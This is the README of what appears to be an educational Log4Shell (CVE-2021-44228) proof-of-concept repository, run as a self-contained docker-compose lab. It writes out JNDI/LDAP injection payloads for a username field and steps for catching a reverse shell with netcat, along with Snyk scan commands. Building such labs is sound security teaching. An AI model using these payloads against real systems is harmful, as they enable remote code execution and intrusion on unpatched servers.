GitHub - ReedOnly/log4shell-equinor

Log4shell proof of concept

Proof of concept for CVE-2021-44228. To learn more about log4shell, check the summary by Snyk.

To start all containers

docker-compose up

Exploit 1:

Go go localhost:8080 and fill username:

${jndi:ldap://exploit:9999/Evil}

Exploit 2:

${jndi:ldap://reverse-shell:1389/a}

Snyk

snyk log4shell
snyk test --all-projects

Shell 1

Start terminal in web-server

docker-compose up web-server

Shell 2

docker-compose up exploit
docker-compose up reverse-shell

Shell 3

Check web server to see if exploit worked:

docker-compose exec web-server bash

Shell 4

Start terminal in ubuntu and listen for reverse shell:

docker-compose up -d ubuntu
docker-compose exec ubuntu bash
nc -lv 9001

Credit

This PoC is heavily based on these resources:

Name		Name	Last commit message	Last commit date
Latest commit History 2 Commits
log4shell-exploit		log4shell-exploit
reverse-shell		reverse-shell
ubuntu		ubuntu
vulnerable-application		vulnerable-application
.gitignore		.gitignore
README.md		README.md
docker-compose.yml		docker-compose.yml

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

Log4shell proof of concept

To start all containers

Exploit 1:

Exploit 2:

Snyk

Shell 1

Shell 2

Shell 3

Shell 4

Credit

About

Releases

Packages

Languages

ReedOnly/log4shell-equinor

Folders and files

Latest commit

History

Repository files navigation

Log4shell proof of concept

To start all containers

Exploit 1:

Exploit 2:

Snyk

Shell 1

Shell 2

Shell 3

Shell 4

Credit

About

Resources

Stars

Watchers

Forks

Releases

Packages 0

Languages

Packages